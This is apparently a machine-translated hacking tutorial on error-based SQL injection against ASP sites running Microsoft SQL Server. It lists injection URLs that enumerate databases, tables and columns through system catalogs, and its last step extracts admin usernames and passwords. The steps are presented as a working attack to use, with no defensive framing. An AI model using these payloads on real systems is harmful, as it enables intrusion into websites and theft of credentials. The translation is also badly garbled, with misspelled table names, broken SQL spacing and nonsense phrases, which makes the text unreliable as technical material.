I have seen a cross-library query written by the meal. I sorted out the generals from the branches to the fade password.
Steps make the ideas clearer.
SQL INJECTION is flexible, the injecting statement is different, the following is only available to the general
Steps, I hope to help you.
1: Out of all library names. Http://www.**.com/***.asp? Id = 1 and 0 <> (select count (*) from master.dbo.sysdatabasees where name> 1 and NAME DBID = 6) Submit DBID = 7, 8, 9 .... Get more database name
2: There is a BBS database in the outburs library, submit the following statement: http://www.***.com/jump.asp? Id = 1 and 0 <> (SELECT TOP 1 Name from BBS .dbo.sysObjects where xtype = 'u') Come get a table to assume admin Submitted: http://www.***.com/jump.asp? id = 1 and 0 <> (SELECT TOP 1 Name from BBS .dbo.sysObjects where xtype = 'u' and name not in ('admin')) to get other tables.
3: Fields in the outbraction submission: http://www.***.com/***.asp? Id = 1 and 0 <> (Select Count (*) from bbs.dbo.sysobjects where xtype = 'U' and name = 'admin' and uid> (STR (ID))) Get UID value assumption to 18779569 UID = ID Submit: http://www.***.com/***.asp? Id = 1 and 0 <> (Select Top 1 Name from bbs.dbo.syscolumns where id = 18779569) Get a field of Admin, assumes User_ID submission: http://www.**.com/***. ASP? ID = 1 and 0 <> (Select Top 1 Name from bbs.dbo.syscolumns where id = 18779569 and name not in ('id', ...)) to overrise other fields
4: Anti-user name and password, etc., have the presence of user_id username, password and other fields, submitted: http://www.***.com/***.asp? Id = 1 and 0 <(Select User_id from bbs.dbo .admin where username> 1) You can get a password in order. . . . .
